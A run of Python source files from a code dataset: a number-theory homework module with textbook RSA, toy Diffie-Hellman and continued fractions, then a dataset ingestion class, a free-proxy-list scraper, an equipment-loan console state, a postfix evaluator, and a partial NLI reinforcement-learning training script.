pass\n return ans\n pass\n \n\n\nclass RSA():\n def __init__(self):\n super().__init__()\n self.p = get_large_prime()\n self.q = get_large_prime()\n self.n = self.p * self.q\n self.len = len(str(self.n))\n self.phi = (self.p-1) * (self.q-1)\n # self.bias = 132435343242330\n # self.charset = '0123456789' + 'abcdefghijklmnopqrstuvwxyz' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + ',.?><[]*%_@{#} \\\\!/:\\n()+-=\\'\"'\n # self.index_to_char = {\n # index + self.bias :char for index,char in enumerate(self.charset)\n # }\n # self.char_to_index = {\n # char : index for index,char in self.index_to_char.items()\n # }\n \n self.e = random.randint(2,self.phi)\n while gcd(self.e,self.phi) != 1:\n self.e = random.randint(2,self.phi)\n self.d = get_inverse(self.e,self.phi)\n\n def lock(self,m):\n m = str(m)\n tmp = []\n for char in m:\n # tmp.append(self.char_to_index[char])\n tmp.append(ord(char))\n c = []\n for char in tmp:\n char = int(char)\n c_tmp = str(fast_power(char,self.e,self.n))\n c_tmp = '0'*(self.len - len(c_tmp)) + c_tmp \n c.append(c_tmp)\n return ''.join(c)\n \n def unlock(self,c,use_china_res=False):\n if not use_china_res:\n c = str(c)\n m = []\n for i in range(0,len(c),self.len):\n c_char = int(c[i:i+self.len])\n c_char = fast_power(c_char,self.d,self.n)\n # c_char = self.index_to_char[c_char]\n c_char = chr(c_char)\n m.append(str(c_char))\n return ''.join(m)\n 
else:\n # count = 0\n c = str(c)\n m = []\n for i in range(0,len(c),self.len):\n print(f'Decoding No.{i} char...')\n c_char = int(c[i:i+self.len])\n # c_char = fast_power(c_char,self.d,self.n)\n b1 = fast_power(c_char,self.d,self.p)\n b2 = fast_power(c_char,self.d,self.q)\n c_char = china_res([b1,b2],[self.p,self.q])[0]\n # c_char = self.index_to_char[c_char]\n c_char = chr(c_char)\n m.append(str(c_char))\n return ''.join(m)\n \n\nclass DH():\n def __init__(self):\n super().__init__()\n self.p = 353\n gs = get_primitive_root(self.p)\n index = random.randint(0,len(gs))\n self.g = gs[index]\n self.sk = 233\n self.pk = fast_power(self.g,self.sk,self.p)\n def change(self,pk_2):\n self.sk = fast_power(pk_2,self.sk,self.p)\n\n\ndef is_large_prime(n:int,k:int=4):\n '''\n Use Miller-Rabin method to judge whether number n is a large prime number.\\n\n k in the safe coefficient and when k = 4(default), the accuracy is bigger than 99.99%.\\n\n '''\n if n == 1 or (n & 1) == 0:\n return False\n if n == 2:\n return True\n t = n - 1\n s = 0\n while (t & 1) == 0:\n # t = t >> 1\n t >>= 1\n s += 1\n\n for _ in range(k):\n b = random.randint(2,n)\n while gcd(b,n) != 1:\n b = random.randint(2,n)\n # r = 0\n index = fast_power(b,t,n)\n\n # r = 0\n if index == 1 or index == (n-1):\n continue\n \n flag = False\n for r in range(1,s):\n index = (index**2) % n\n if index == 1:\n return False\n if index == (n-1):\n flag = True\n if flag:\n break\n if flag:\n continue\n else:\n return False\n return True\n\ndef get_large_prime(low:int=2**100,high:int=2**200,k:int=4):\n '''\n Use Miller-Rabin method to find a large prime number.\\n\n Please make sure the difference between low and high is sufficiently big.\\n\n k in the safe coefficient and when k = 4(default), the accuracy is bigger than 99.99%.\\n\n '''\n while True:\n n = random.randint(low,high)\n if is_large_prime(n,k):\n return n\n\n\ndef lian_fen_shu(x,K:int=10):\n '''\n 构造简单的连分数\\n\n x是需要计算的数字\\n\n K是迭代次数 默认是10\\n\n 返回一个元组:第1个元素是近似值,第2个元素是连分数,是一个list\\n\n '''\n tmps = []\n a = math.floor(x)\n x = x - a\n k = 0\n tmps.append(a)\n while x != 0 and k < K:\n a = math.floor(1 / x)\n x = 1/x - a\n tmps.append(a)\n k += 1\n tmps = tmps[::-1]\n ans = tmps[0]\n for index in range(1,len(tmps)):\n ans = 1/ans + tmps[index]\n # print(tmps[::-1])\n return ans,tmps[::-1]\n\n\n\nclass Fenshu():\n def __init__(self,num=1,den=1):\n '''num是分子默认为1\\nden是分母默认为1\\n'''\n super().__init__()\n self.num = int(num)\n self.den = int(den)\n \n def add(self,y):\n num = self.num * y.den + self.den * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def sub(self,y):\n num = self.num * y.den - self.den * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def mul(self,y):\n num = self.num * y.num\n den = self.den * y.den\n tmp = gcd(num,den)\n num //= tmp\n den //= tmp\n return Fenshu(num,den)\n \n def inv(self):\n return Fenshu(self.den,self.num)\n \n def div(self,y):\n return self.mul(y.inv())\n\n def display(self):\n return self.num,self.den\n \n def xiaoshu(self):\n return self.num / self.den\n\n def to_lianfenshu(self):\n '''转换成连分数的形式\\n如果这个分数是负数,会被转换成正数来进行操作\\n'''\n ans = []\n num = abs(self.num)\n den = abs(self.den)\n zhengshu = num // den\n xiaoshu = Fenshu(num - zhengshu * den,den)\n ans.append(zhengshu)\n while xiaoshu.num != 0:\n xiaoshu = xiaoshu.inv()\n zhengshu = xiaoshu.num // xiaoshu.den\n xiaoshu = Fenshu(xiaoshu.num - zhengshu * xiaoshu.den, xiaoshu.den)\n 
ans.append(zhengshu)\n return ans\n\n\n\ndef lianfenshu_to_float(X:list):\n '''从一个list的连分数转换成分子/分母\\n'''\n X = [Fenshu(x) for x in X]\n ans = X[-1]\n X = X[0:-1][::-1]\n for x in X:\n ans = ans.inv().add(x)\n return ans.display(),ans.xiaoshu()\n\n\n\nif __name__ == '__main__':\n # n = 2**257 - 1\n # n = 19260817\n # for p in [89,107]:\n # n = 2**p - 1\n # print(f'p = {p} , n = {n} , {is_large_prime(n)}')\n # print(gcd(12,10,6,4,6454))\n\n\n # d = DH()\n # d.change(40)\n # a = 61\n # print(get_primitive_root(a))\n # print(is_large_prime(2**67 - 1))\n # n = 2**257 - 1\n # s = 1\n # t = (n-1) // (2**s)\n # print(fast_power(3,t,n))\n\n\n # print(lian_fen_shu(math.pi,10) )\n # with open('ans.json','w',encoding='utf8') as f:\n # ts = [(20210520,113),(210520,191)]\n # ANS = {}\n # for index,t in enumerate(ts):\n # ans = {}\n # a,b = t\n # ans['a'] = a\n # ans['b'] = b\n # ans['连分数'] = lian_fen_shu(a/b,100)[1]\n # # print(lian_fen_shu(a/b,100))\n # # print(bezout(a,b))\n # ans['a的系数'],ans['b的系数'] = bezout(a,b)\n # ANS[index] = ans\n # json.dump(ANS,f,ensure_ascii=False)\n\n # r = RSA()\n # text = ''\n # with open('out.txt','r',encoding='utf8') as f:\n # text = f.read()\n # c = r.lock(text)\n # print(c)\n # with open('cipher_text.txt','w+') as f:\n # f.write(c)\n # print()\n # print(r.unlock(c,False))\n\n\n # all = 0\n # true = 0\n # for n in range(100000):\n # if is_large_prime(n):\n # all += 1\n # if is_prime(n):\n # true += 1\n # print(true / all)\n\n # a = get_large_prime()\n # print(a,get_prime_factors(a))\n pi = [3,7,15,1,293,10,3,8,2,1,3,11,1,2,1,2,1]\n ans = lianfenshu_to_float(pi)\n num = ans[0][0]\n den = ans[0][1]\n print(ans)\n print(pi)\n print(Fenshu(num,den).to_lianfenshu())\n print(Fenshu(22,7).xiaoshu())\n\n\n # a = Fenshu(1,3)\n # b = Fenshu(2,5)\n # c = a.div(b)\n # print(c.display())\n\n \n\n # ms = [5,6,7]\n # m = 1\n # for _ in ms:\n # m *= _\n # Ms = list(map(lambda x:m//x,ms))\n # for Mi,mi in zip(Ms,ms):\n # print(f'{m}/{mi}={Mi}模{mi}逆元是{get_inverse(Mi,mi)}')\n\n\n pass\n\n # for n in [191,191**2,113,113*9]:\n # for b in [2,3,5,7]:\n # print(f'n = {n} , b = {b} , mod = {fast_power(b,n-1,n)}')\n\n# a = [3,1,1,2,3,1,1]\n# a = a[::-1]\n# ans = a[0]\n# for i in range(1,len(a)):\n# ans = 1/ans + a[i]\n# print(ans - 7700/2145)\n\n\n# a = 1\n# for i in range(10000):\n# a = 1/a + 1\n# print(a - (5**0.5+1)/2)","repo_name":"zerzerzerz/xinanshuji","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":26851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
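The china_res helper in the file above builds the Chinese-remainder solution as the sum of b_i * M_i * M_i^{-1} modulo M. A standalone cross-check of that construction, not code from the repository; it uses the classic x = 2 (mod 3), x = 3 (mod 5), x = 2 (mod 7) example and Python 3.8's three-argument pow for the modular inverse:

def crt(residues, moduli):
    M = 1
    for m in moduli:
        M *= m
    x = 0
    for b, m in zip(residues, moduli):
        Mi = M // m
        x += b * Mi * pow(Mi, -1, m)   # pow(Mi, -1, m): modular inverse (Python 3.8+)
    return x % M, M

assert crt([2, 3, 2], [3, 5, 7]) == (23, 105)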
+{"seq_id":"24042276584","text":"from FarmInsectsClassifier.entity.config_entity import DataIngestionConfig\nfrom FarmInsectsClassifier.logger import logging\nfrom FarmInsectsClassifier.exception import DataIngestionError\n\nfrom pathlib import Path\nfrom zipfile import ZipFile\nimport splitfolders\n\nclass DataIngestion:\n def __init__(self, data_path: Path, config: DataIngestionConfig):\n self.data_path = data_path\n self.config = config\n\n def unzip(self) -> None:\n \n unzip_path = self.config.unzip_dir\n unzip_path.mkdir(exist_ok=True, parents=True)\n\n logging.info(\"Extracting zip file\")\n\n with ZipFile(self.data_path, \"r\") as zip_ref:\n zip_ref.extractall(unzip_path)\n\n logging.info(\"Zipfile extraction completed\")\n\n \n\n\n def split_data(self) -> None:\n \n path = list(self.config.unzip_dir.resolve().iterdir())[0]\n output = self.config.unzip_dir / \"farm-insects-splitted\"\n\n logging.info(\"Splitting folder into train, test and validation set\")\n\n splitfolders.ratio(path, seed=1, output=str(output), ratio=(0.6, 0.2, 0.2))\n\n logging.info(\"Train, test and validation data successfully created\")\n\n \n","repo_name":"yickysan/Farm-Insects-Classification","sub_path":"src/FarmInsectsClassifier/components/data_ingestion.py","file_name":"data_ingestion.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40864339359","text":"from collections import namedtuple, defaultdict\nimport requests\nimport itertools\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\nimport shelve\nimport warnings\nfrom concurrent.futures import ThreadPoolExecutor\n\n\nfrom .config import CACHE_PATH\nfrom .exceptions import PageServerDown\n\n\nclass Proxy:\n\n\t__slots__ = ('ip', 'port', 'type', 'anonymous', 'speed', 'time_since_last_check')\n\n\tdef __init__(self, ip, port, type, anonymous, speed, time_since_last_check):\n\t\tself.ip = ip\n\t\tself.port = port\n\t\tself.type = type\n\t\tself.anonymous = anonymous\n\t\tself.speed = speed\n\t\tself.time_since_last_check = time_since_last_check\n\n\tdef to_string(self):\n\t\treturn '{}:{}'.format(self.ip, self.port)\n\n\t__repr__ = __str__ = to_string\n\n\tdef __eq__(self, other):\n\t\treturn self.to_string() == other.to_string()\n\n\tdef __hash__(self):\n\t\treturn hash(self.to_string())\n\n\ndef parse_page(url):\n\t\"\"\" Parse a single html page on https://www.xicidaili.com to get a list of proxies \"\"\"\n\tnow = datetime.today()\n\n\theaders = headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\tpage = requests.get(url, headers=headers)\n\tif page.status_code != 200:\n\t\twarnings.warn('{} could not be connected at the moment'.format(url))\n\t\t# raise PageServerDown('{} could not connect'.format(url))\n\tsoup = BeautifulSoup(page.text, 'lxml')\n\n\tproxies = list()\n\tfor row in soup.find_all('tr'):\n\t\tcols = row.find_all('td')\n\t\tif len(cols) == 10:\n\t\t\tspeed = cols[6].find(class_='bar_inner').attrs['style'] # width:99%\n\t\t\tspeed = float(''.join(filter(lambda x: x.isdigit(), speed)))\n\n\t\t\tlast_check_time = datetime.strptime(cols[-1].text.strip(), '%y-%m-%d %H:%M')\n\t\t\ttime_since_last_check = (now - last_check_time).seconds\n\n\t\t\tp = Proxy(ip=cols[1].text, \n\t\t\t\t\tport=cols[2].text, \n\t\t\t\t\ttype=cols[5].text, \n\t\t\t\t\tanonymous=(cols[4].text=='高匿'), \n\t\t\t\t\tspeed=speed,\n\t\t\t\t\ttime_since_last_check=time_since_last_check)\n\t\t\tproxies.append(p)\n\treturn proxies\n\n\ndef get_proxies(use_cache=False, save=True):\n\t# TODO: http://www.kuaidaili.com/free/inha/\n\n\tif use_cache:\n\t\t# set flag to 'r' to support concurrent reads\n\t\twith shelve.open(CACHE_PATH, flag='r') as f:\n\t\t\tproxies = {k: v for k, v in f.items()}\n\t\t\treturn proxies\n\n\tXICI = 'https://www.xicidaili.com/{}/{}'\n\n\tproxies = defaultdict(list)\n\t# get the first 10 pages\n\t# for url in [XICI.format(*i) for i in itertools.product(['wn', 'wt'], range(1, 11))]:\n\t# \tfor proxy in parse_page(url):\n\t# \t\tproxies[proxy.type].append(proxy)\n\n\twith ThreadPoolExecutor(max_workers=20) as ex:\n\t\tresults = ex.map(parse_page, \n\t\t\t[XICI.format(*i) for i in itertools.product(['wn', 'wt'], range(1, 11))])\n\n\tfor result in results:\n\t\tfor proxy in result:\n\t\t\tproxies[proxy.type].append(proxy)\n\n\tif save:\n\t\t# TODO: adding thread locks here\n\t\twith shelve.open(CACHE_PATH, writeback=True) as f:\n\t\t\tfor k, v in proxies.items():\n\t\t\t\tf[k] = v\n\t\tprint('Saved to {}'.format(CACHE_PATH))\n\treturn proxies\n\n\n","repo_name":"MaxwellLZH/random-proxy","sub_path":"randomproxy/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"42605224065","text":"#!/usr/bin/env python\nfrom db.EquipmentRecord import EquipmentRecord\nfrom db.AccountRecord import AccountRecord\nimport state as state\nimport dev.display.Console as Console\nfrom state.commonResource import CommonResource as cmn_res\nfrom db.UserProcedure import UserProcedure\nfrom dev.input import input\n\nclass ConfirmToUpdateProcedure(state.IState):\n def entry(self):\n self.__input = input.SunitizedString(\n input.ConsoleTextField()\n )\n self.__get_next_state = state.ErrorHasOccurred()\n\n Console.clear()\n Console.puts(\"以下の内容で手続きを行います。よろしいですか?(Y/N)\")\n Console.puts(\"ユーザID :\", cmn_res.user.data[AccountRecord.EMPLOYEE_ID])\n Console.puts(\"機材ID :\", cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_ID])\n Console.puts(\"機材名 :\", cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_NAME])\n Console.puts(\"返却予定日:\", cmn_res.equipment.data[EquipmentRecord.END_DATE])\n Console.puts(\">\", end=\"\")\n self.__get_next_state = state.ErrorHasOccurred()\n\n def do(self):\n self.__input.capture()\n\n def exit(self):\n if( self.__input.get_string() in [\"y\",\"Y\"]):\n result = UserProcedure(True).update_equipment_return_date(\n cmn_res.user.data[AccountRecord.EMPLOYEE_ID],\n cmn_res.equipment.data[EquipmentRecord.EQUIPMENT_ID],\n cmn_res.equipment.data[EquipmentRecord.END_DATE])\n if result == True:\n self.__get_next_state = state.SuccessUpdateEquipment()\n else:\n Console.puts(\"更新の受理に失敗しました。\")\n Console.puts(\"再度試しても失敗する場合、システム管理者に問い合わせてください。\", \"\\n\")\n self.__get_next_state = state.ErrorHasOccurred()\n else:\n Console.puts(\"更新手続きをキャンセルしました。\")\n self.__get_next_state = state.GotoNextAfterWaiting()\n self.__get_next_state.set_next_state(state.StandbyUpdateEquipmentIdInput())\n\n def get_next_state(self):\n return self.__get_next_state\n\n def should_exit(self):\n return self.__input.submitted()\n","repo_name":"soudai-aisw/aisw_bihin","sub_path":"src/state/ConfirmToUpdateProcedure.py","file_name":"ConfirmToUpdateProcedure.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"}
+{"seq_id":"29996906137","text":"\ndef post_fix(expr):\n pieces = expr.split()\n nums = [p for p in pieces if p.isnumeric()]\n ops = [p for p in pieces if not p.isnumeric()]\n \n curr = nums[0]\n \n for num,op in zip(nums[1:],ops):\n curr = str(int(eval(curr+op+num)))\n \n return int(curr)\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"kZSi2XWDpu83miexy_1.py","file_name":"kZSi2XWDpu83miexy_1.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"41255664595","text":"import os\nimport sys\nimport time\nimport argparse\nfrom collections import Counter\nimport numpy as np\nimport random\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nfrom tqdm import tqdm\nfrom data import get_nli, get_batch, build_vocab\nfrom mutils import get_optimizer\nfrom models import critic, actor\nfrom read_data import get_SICK_data\nprint(\"sick: model_actor_avg0.25_17\")\nparser = argparse.ArgumentParser(description='NLI training')\n\nsamplecnt = 1\nepsilon = 0.05\nalpha = 0.1\nverbose = 1\nif verbose:\n f = open(\"results.txt\", \"w\")\n f.close()\n\nbothCritic = \"both_critic0.25abs_nodelay.pickle-ds\"\nbothActor = \"both_actor0.25abs_nodelay.pickle-ds\"\n\n\n# paths\nparser.add_argument(\"--nlipath\", type=str, default='dataset/SNLI/', help=\"NLI data path (SNLI or MultiNLI)\")\nparser.add_argument(\"--outputdir\", type=str, default='savedir/SOUVIK/', help=\"Output directory\")\nparser.add_argument(\"--criticmodelname\", type=str, default='model_best_souvik.pickle')\nparser.add_argument(\"--actormodelname\", type=str, default='model_actor_avg0.25.pickle')\nparser.add_argument(\"--word_emb_path\", type=str, default=\"dataset/glove.840B.300d.txt\", help=\"word embedding file path\")\n\n# training\nparser.add_argument(\"--n_epochs\", type=int, default=1)\nparser.add_argument(\"--batch_size\", type=int, default=5)\nparser.add_argument(\"--dpout_model\", type=float, default=0., help=\"encoder dropout\")\nparser.add_argument(\"--dpout_fc\", type=float, default=0., help=\"classifier dropout\")\nparser.add_argument(\"--nonlinear_fc\", type=float, default=1, help=\"use nonlinearity in fc\")\nparser.add_argument(\"--optimizer\", type=str, default=\"sgd,lr=0.01\", help=\"adam or sgd,lr=0.1\")\nparser.add_argument(\"--lrshrink\", type=float, default=1, help=\"shrink factor for sgd\")\nparser.add_argument(\"--decay\", type=float, default=0.99, help=\"lr decay\")\nparser.add_argument(\"--minlr\", type=float, default=1e-5, help=\"minimum lr\")\nparser.add_argument(\"--max_norm\", type=float, default=5., help=\"max norm (grad clipping)\")\n\n# model\nparser.add_argument(\"--encoder_type\", type=str, default='InferSent', help=\"see list of encoders\")\nparser.add_argument(\"--enc_lstm_dim\", type=int, default=1024, help=\"encoder nhid dimension\")\nparser.add_argument(\"--n_enc_layers\", type=int, default=1, help=\"encoder num layers\")\nparser.add_argument(\"--fc_dim\", type=int, default=512, help=\"nhid of fc layers\")\nparser.add_argument(\"--n_classes\", type=int, default=3, help=\"entailment/neutral/contradiction\")\nparser.add_argument(\"--pool_type\", type=str, default='max', help=\"max or mean\")\n\n# gpu\nparser.add_argument(\"--gpu_id\", type=int, default=0, help=\"GPU ID\")\nparser.add_argument(\"--seed\", type=int, default=1234, help=\"seed\")\n\n# data\nparser.add_argument(\"--word_emb_dim\", type=int, default=300, help=\"word embedding dimension\")\n\nparams, _ = parser.parse_known_args()\n\n# set gpu device\ntorch.cuda.set_device(params.gpu_id)\n\n# print parameters passed, and all parameters\nprint('\\ntogrep : {0}\\n'.format(sys.argv[1:]))\nprint(params)\n\nnp.random.seed(params.seed)\ntorch.manual_seed(params.seed)\ntorch.cuda.manual_seed(params.seed)\n\n\"\"\"\nDATA\n\"\"\"\n#train, valid, test = get_nli(params.nlipath)\n\ntrain, valid, test = get_SICK_data()\n\nword_vec = build_vocab(train['s1'] + train['s2'] +\n valid['s1'] + valid['s2'] +\n test['s1'] + test['s2'], params.word_emb_path)\n\n\nfor split in ['s1', 
's2']:\n for data_type in ['train', 'valid', 'test']:\n eval(data_type)[split] = np.array([[word for word in sent.split() if word in word_vec] for sent in eval(data_type)[split]])\n\n\n\n\"\"\"\nMODEL\n\"\"\"\n# model config\nconfig_nli_model = {\n 'n_words' : len(word_vec) ,\n 'word_emb_dim' : params.word_emb_dim ,\n 'enc_lstm_dim' : params.enc_lstm_dim ,\n 'n_enc_layers' : params.n_enc_layers ,\n 'dpout_model' : params.dpout_model ,\n 'dpout_fc' : params.dpout_fc ,\n 'fc_dim' : params.fc_dim ,\n 'bsize' : params.batch_size ,\n 'n_classes' : params.n_classes ,\n 'pool_type' : params.pool_type ,\n 'nonlinear_fc' : params.nonlinear_fc ,\n 'encoder_type' : params.encoder_type ,\n 'use_cuda' : True ,\n\n}\n\n# model\nencoder_types = ['InferSent', 'BLSTMprojEncoder', 'BGRUlastEncoder',\n 'InnerAttentionMILAEncoder', 'InnerAttentionYANGEncoder',\n 'InnerAttentionNAACLEncoder', 'ConvNetEncoder', 'LSTMEncoder']\nassert params.encoder_type in encoder_types, \"encoder_type must be in \" + \\\n str(encoder_types)\nnli_net = critic(config_nli_model)\nactorModel = actor(params.enc_lstm_dim, params.word_emb_dim)\nprint(nli_net)\nprint(actorModel)\n\n\nfor name, x in nli_net.named_parameters():\n print(name)\n\nfor name, x in actorModel.named_parameters():\n print(name)\n\n#print(nli_net.target_pred.enc_lstm.weight_ih_l0)\n#print(nli_net.target_classifier[4].bias)\n\n# loss\nweight = torch.FloatTensor(params.n_classes).fill_(1)\nloss_fn = nn.CrossEntropyLoss(weight=weight)\nloss_fn.size_average = False\n\n\n# optimizer\noptim_fn, optim_params = get_optimizer(params.optimizer)\ncritic_target_optimizer = optim_fn(list(nli_net.target_pred.parameters()) + list(nli_net.target_classifier.parameters()), **optim_params)\n\noptim_fn2, optim_params2 = get_optimizer(params.optimizer)\ncritic_active_optimizer = optim_fn(list(nli_net.active_pred.parameters()) + list(nli_net.active_classifier.parameters()), **optim_params2)\n\n\noptim_fn3, optim_params3 = get_optimizer(\"adam,lr=0.1\")\nactor_target_optimizer = optim_fn3(actorModel.target_policy.parameters(), **optim_params3)\n\noptim_fn4, optim_params4 = get_optimizer(\"adam,lr=0.1\")\nactor_active_optimizer = optim_fn4(actorModel.active_policy.parameters(), **optim_params4)\n\n# cuda by default\nnli_net.cuda()\nactorModel.cuda()\nloss_fn.cuda()\n\n\ndef Sampling_RL(current, summary, length, epsilon, Random = True):\n current_lower_state = torch.zeros(1, 2*params.enc_lstm_dim).cuda()\n current = current.squeeze(0)\n actions = []\n states = []\n for pos in range(0, length):\n predicted = actorModel.get_target_output(current_lower_state, current[pos], summary, scope = \"target\")\n states.append([current_lower_state, current[pos], summary])\n if Random:\n if random.random() > epsilon:\n action = (0 if random.random() < float(predicted[0].item()) else 1)\n else:\n action = (1 if random.random() < float(predicted[0].item()) else 0)\n else:\n action = int(torch.argmax(predicted))\n actions.append(action)\n if action == 1:\n out_d, current_lower_state = nli_net.forward_lstm(current_lower_state, current[pos], scope = \"target\")\n\n Rinput = []\n for (i, a) in enumerate(actions):\n if a == 1:\n Rinput.append(current[i])\n Rlength = len(Rinput)\n \n if Rlength == 0:\n actions[length-2] = 1\n Rinput.append(current[length-2])\n Rlength = 1\n \n Rinput = torch.stack(Rinput)\n return actions, states, Rinput, Rlength\n \n\n\"\"\"\nTRAIN\n\"\"\"\nval_acc_best = -1e10\nadam_stop = False\nstop_training = False\nlr = optim_params2['lr'] if 'sgd' in params.optimizer else 
None\n\n\ndef trainepoch(epoch, RL_train = True, LSTM_train = True):\n print('\\nTRAINING : Epoch ' + str(epoch))\n \n actorModel.train(False)\n nli_net.train(False)\n if RL_train:\n print(\"Actor Training\")\n print('Learning rate : {0}'.format(actor_active_optimizer.param_groups[0]['lr']))\n actorModel.train()\n if LSTM_train:\n print(\"InferSent Training\")\n critic_active_optimizer.param_groups[0]['lr'] = critic_active_optimizer.param_groups[0]['lr'] * params.decay if epoch>1\\\n and 'sgd' in params.optimizer else critic_active_optimizer.param_groups[0]['lr']\n print('Learning rate : {0}'.format(critic_active_optimizer.param_groups[0]['lr']))\n nli_net.train()\n \n all_costs = []\n logs = []\n words_count = 0\n\n last_time = time.time()\n correct = 0.\n # shuffle the data\n permutation = np.random.permutation(len(train['s1']))\n\n s1 = train['s1'][permutation]\n s2 = train['s2'][permutation]\n target = train['label'][permutation]\n\n\n for stidx in tqdm(range(0, len(s1), params.batch_size)):\n \n s1_batch, s1_len = get_batch(s1[stidx:stidx + params.batch_size],\n word_vec, params.word_emb_dim)\n s2_batch, s2_len = get_batch(s2[stidx:stidx + params.batch_size],\n word_vec, params.word_emb_dim)\n s1_batch, s2_batch = Variable(s1_batch.cuda()), Variable(s2_batch.cuda())\n tgt_batch = Variable(torch.LongTensor(target[stidx:stidx + s1_batch.size(1)])).cuda()\n k = s1_batch.size(1) # actual batch size\n predict = torch.zeros(s1_batch.size(1), params.n_classes).cuda()\n avgloss = 0.\n totloss = 0.\n nli_net.assign_active_network()\n actorModel.assign_active_network()\n #print(\"Target Weight: \", actorModel.target_policy.W1.weight.data, \"\\n\\n\")\n for kk in range(s1_batch.size(1)):\n left = s1_batch.transpose(0,1)[kk].view(-1, 1, 300)\n right = s2_batch.transpose(0,1)[kk].view(-1, 1, 300)\n left_len = np.array([s1_len[kk]])\n right_len = np.array([s2_len[kk]])\n tgt = tgt_batch[kk].view(-1)\n if RL_train:\n leftSummary = nli_net.summary((left, left_len))[-1]\n rightSummary = nli_net.summary((right, right_len))[-1]\n actionlist_left, actionlist_right, statelist_left, statelist_right, losslist = [], [], [], [], []\n aveloss = 0.\n for i in range(samplecnt):\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=True)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=True)\n actionlist_left.append(actions_left)\n statelist_left.append(states_left)\n actionlist_right.append(actions_right)\n statelist_right.append(states_right)\n out = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n loss_ = loss_fn(out, tgt)\n lossL = (((float(Rlength_left) / int(left.size(1))) + (int(left.size(1)) / float(Rlength_left)) * 0.25) - 1.0)\n lossR = (((float(Rlength_right) / int(right.size(1))) + (int(right.size(1)) / float(Rlength_right)) * 0.25) - 1.0)\n loss_ = loss_ + ((lossL + lossR)/2) * 0.1 * params.n_classes\n aveloss += loss_\n losslist.append(loss_)\n aveloss /= samplecnt\n totloss += aveloss\n grad1 = None\n grad2 = None\n grad3 = None\n grad4 = None\n flag = 0 \n if LSTM_train:\n critic_active_optimizer.zero_grad()\n critic_target_optimizer.zero_grad()\n actions_left, states_left, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=False)\n actions_right, states_right, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, 
Random=False)\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n predict[kk] = output\n loss = loss_fn(output, tgt)\n avgloss += loss.item()\n loss.backward()\n nli_net.assign_active_network_gradients()\n shrink_factor = 1\n total_norm = 0\n for p in nli_net.active_pred.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n for p in nli_net.active_classifier.parameters():\n if p.requires_grad:\n p.grad.data.div_(k ** 2) # divide by the actual batch size\n total_norm += p.grad.data.norm() ** 2\n total_norm = np.sqrt(total_norm.cpu())\n if total_norm > params.max_norm:\n shrink_factor = params.max_norm / total_norm\n current_lr = critic_active_optimizer.param_groups[0]['lr'] # current lr (no external \"lr\", for adam)\n critic_active_optimizer.param_groups[0]['lr'] = current_lr * shrink_factor # just for update\n critic_active_optimizer.param_groups[0]['lr'] = current_lr \n critic_active_optimizer.step()\n actor_target_optimizer.zero_grad()\n for i in range(samplecnt): #5\n for pos in range(len(actionlist_left[i])): #19 --> 13\n rr = [0, 0]\n rr[actionlist_left[i][pos]] = ((losslist[i] - aveloss) * alpha).cpu().item()\n g = actorModel.get_gradient(statelist_left[i][pos][0], statelist_left[i][pos][1], statelist_left[i][pos][2], rr, scope = \"target\")\n if flag == 0:\n grad1 = g[0]\n grad2 = g[1]\n grad3 = g[2]\n grad4 = g[3]\n flag = 1\n else:\n grad1 += g[0]\n grad2 += g[1]\n grad3 += g[2]\n grad4 += g[3]\n for pos in range(len(actionlist_right[i])): # 25 --> 5\n rr = [0, 0]\n rr[actionlist_right[i][pos]] = ((losslist[i] - aveloss) * alpha).cpu().item()\n g = actorModel.get_gradient(statelist_right[i][pos][0], statelist_right[i][pos][1], statelist_right[i][pos][2], rr, scope = \"target\")\n grad1 += g[0]\n grad2 += g[1]\n grad3 += g[2]\n grad4 += g[3]\n actor_active_optimizer.zero_grad()\n actorModel.assign_active_network_gradients(grad1, grad2, grad3, grad4)\n \n actor_active_optimizer.step()\n #output = nli_net((left, left_len), (right, right_len), \"target\")\n _, _, Rinput_left, Rlength_left = Sampling_RL(left, rightSummary, int(left_len), epsilon, Random=False)\n _, _, Rinput_right, Rlength_right = Sampling_RL(right, leftSummary, int(right_len), epsilon, Random=False)\n output = nli_net((Rinput_left, np.array([Rlength_left])), (Rinput_right, np.array([Rlength_right])), scope = \"target\")\n predict[kk] = output\n else:\n critic_active_optimizer.zero_grad()\n critic_target_optimizer.zero_grad()\n output = nli_net((left, left_len), (right, right_len), \"target\")\n predict[kk] = output\n loss = loss_fn(output, tgt)\n avgloss += loss.item()\n loss.backward()\n nli_net.assign_active_network_gradients()\n shrink_factor = 